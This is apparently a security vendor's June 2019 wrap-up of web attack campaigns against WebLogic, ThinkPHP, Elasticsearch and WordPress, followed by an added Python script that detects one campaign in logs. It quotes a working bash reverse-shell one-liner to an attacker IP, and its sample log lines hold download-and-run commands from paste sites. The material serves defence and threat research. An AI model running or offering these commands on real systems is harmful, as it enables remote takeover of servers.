Security researchers at F5 Networks constantly monitor web traffic at various locations all over the world. This allows us to detect “in the wild” malware, and to get an insight into the current threat landscape. Here’s an overview of what we saw in June 2019.
During the month of June, the team detected 12 new attack campaigns:
- Seven campaigns targeted two separate Oracle WebLogic Server vulnerabilities, CVE-2017-10271 and CVE-2019-2725. Both are unsafe deserialization flaws that an unauthenticated attacker can exploit for remote code execution (RCE).
- In addition to attacks exploiting Oracle WebLogic vulnerabilities, the following notable campaigns were detected this month:
- Convert Plus Plugin Unauthenticated Administrator Creation: The threat actor tried to create an administrator account on a vulnerable WordPress installation.
- ThinkPHP Remote Code Execution (CVE-2018-10225): Threat actors used seven distinct methods to instruct the server to download and execute a cryptominer. The malware was written in Golang. To learn more about this, check out the analysis on F5 Labs.
- ElasticSearch Search Groovy Sandbox Bypass (CVE-2014-3120): The threat actor instructs the server to download and execute a cryptocurrency miner. (Note that CVE-2014-3120 is the Elasticsearch dynamic-scripting RCE reachable through the _search API; the Groovy sandbox bypass proper is tracked as CVE-2015-1427. Both are exploited the same way, by embedding a script in a search request.)
- The final two campaigns, which are not discussed in detail here, are a SeaCMS search Remote Code Execution campaign (die MD5) and a phpMyAdmin (PMA) configuration code injection.
Oracle WebLogic Server Deserialization Remote Code Execution (CVE-2017-10271): 8zxx
Oracle WebLogic servers are widely used by corporations and have been affected by a series of deserialization vulnerabilities. We've reported on this before and have continued to detect campaigns targeting the same Oracle WebLogic Server (WLS) Security Component vulnerability that leads to RCE. For the technical details behind the vulnerability, check out our April monthly wrap-up, Vulnerabilities, Exploits, and Malware Driving Attack Campaigns in April 2019; for more details on some of the payloads used, see the May monthly wrap-up.
One new payload-delivery technique for this exploit was seen in June 2019. A threat actor exploits CVE-2017-10271 to instruct the server to download a malicious file from termbin (a command-line pastebin service). While termbin is very similar to Pastebin, this is the first campaign we have seen that fetches its payload from it. We've named this campaign 8zxx after the name of the file downloaded from termbin. The content of the downloaded file is: bash >& /dev/tcp/220.127.116.11/80 0>&1. This one-liner creates a reverse shell: bash opens an outbound TCP connection to the threat actor's IP on port 80 through the /dev/tcp pseudo-device, redirects its stdout and stderr to that socket (>&) and its stdin from it (0>&1), so the attacker can type commands to the server without any inbound port being exposed on the victim. Using port 80 also lets the connection blend in with ordinary outbound HTTP traffic, which often passes egress filtering.
An Oracle WebLogic server vulnerable to CVE-2017-10271 downloads the malicious file from the termbin address and executes it, creating the reverse shell described above. Based on the team's analysis, we have concluded that the IP address controlled by the threat actor is located in Sao Paulo, Brazil. Port 80 (HTTP) was not open at the time of scanning, but other ports were, including 22 (SSH) and 5060 (SIP). Note that a closed port at scan time says little about the campaign's status: the reverse-shell listener only needs to be up when a victim calls back, and threat actors commonly start it on demand.
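The following detection logic is an added example, not F5 Labs code, showing how a practitioner could spot this campaign in request logs and pull indicators out of the downloaded script. It assumes a WAF or reverse proxy that logs the request line plus a fragment of the request body as the last quoted field (the sample lines are constructed), and it keys on the /wls-wsat/ path, which is the endpoint CVE-2017-10271 exploit traffic is known to hit but which this wrap-up itself does not name; the IP address, port and file name are the ones quoted above.

```python
import re
from dataclasses import dataclass
from typing import List, Optional, Tuple

# Constructed sample log lines (not real telemetry). Assumption: the logger records the
# request line and a fragment of the POST body as the final quoted field. The /wls-wsat/
# path is the endpoint associated with CVE-2017-10271 exploitation; the wrap-up does not
# name it, so it is an assumption here.
SAMPLE_LOG = """\
10.0.0.7 - - [12/Jun/2019:08:14:02 +0000] "POST /wls-wsat/CoordinatorPortType HTTP/1.1" 500 822 "wget -q -O /tmp/8zxx https://termbin.com/8zxx; bash /tmp/8zxx"
10.0.0.9 - - [12/Jun/2019:08:15:10 +0000] "GET /console/login/LoginForm.jsp HTTP/1.1" 200 3110 "-"
10.0.0.7 - - [12/Jun/2019:08:16:44 +0000] "POST /wls-wsat/CoordinatorPortType11 HTTP/1.1" 500 822 "curl -s https://pastebin.com/raw/abcd1234 | sh"
10.0.0.12 - - [12/Jun/2019:08:17:01 +0000] "POST /wls-wsat/CoordinatorPortType HTTP/1.1" 500 822 "id"
"""

# The 8zxx file content quoted in the wrap-up.
SAMPLE_PAYLOAD = "bash >& /dev/tcp/220.127.116.11/80 0>&1"

# Request line inside the log entry; only this field carries "HTTP/x.y", so the body
# fragment (also quoted) cannot match it.
REQUEST_LINE = re.compile(r'"(?P<method>[A-Z]+) (?P<path>\S+) HTTP/[\d.]+"')
WSAT_PATH = re.compile(r"^/wls-wsat/")
# termbin and pastebin raw links; the trailing id is the file name (8zxx in this campaign).
PASTE_URL = re.compile(
    r"https?://(?P<service>termbin\.com|pastebin\.com/raw)/(?P<id>[A-Za-z0-9]+)"
)
# bash reverse-shell target: /dev/tcp/<ip>/<port>
DEV_TCP = re.compile(r"/dev/tcp/(?P<ip>\d{1,3}(?:\.\d{1,3}){3})/(?P<port>\d{1,5})")


@dataclass
class Finding:
    line_no: int
    client: str
    path: str
    paste_service: Optional[str]  # None when the request hit wls-wsat with no paste URL
    paste_id: Optional[str]


def scan_log(text: str) -> List[Finding]:
    """Flag requests to the WLS-WSAT endpoint and any pastebin-style download they carry."""
    findings: List[Finding] = []
    for line_no, line in enumerate(text.splitlines(), start=1):
        m = REQUEST_LINE.search(line)
        if not m or not WSAT_PATH.match(m.group("path")):
            continue
        client = line.split(" ", 1)[0]
        paste = PASTE_URL.search(line)
        findings.append(
            Finding(
                line_no=line_no,
                client=client,
                path=m.group("path"),
                paste_service=paste.group("service") if paste else None,
                paste_id=paste.group("id") if paste else None,
            )
        )
    return findings


def extract_reverse_shells(payload: str) -> List[Tuple[str, int]]:
    """Return (ip, port) pairs for bash /dev/tcp reverse shells found in a downloaded script."""
    return [(m.group("ip"), int(m.group("port"))) for m in DEV_TCP.finditer(payload)]


if __name__ == "__main__":
    for finding in scan_log(SAMPLE_LOG):
        print(finding)
    print(extract_reverse_shells(SAMPLE_PAYLOAD))
```

Every hit on /wls-wsat/ is worth a look even without a paste URL (the fourth sample line carries a bare `id` probe), while a paste-site download in the same request is the high-confidence signal for this family of campaigns. The IP and port extracted from the script are the indicators to block at the egress firewall, and an unexpected outbound connection from the WebLogic service account to a paste site or to port 80 on a non-CDN address is the host-side counterpart of the same detection.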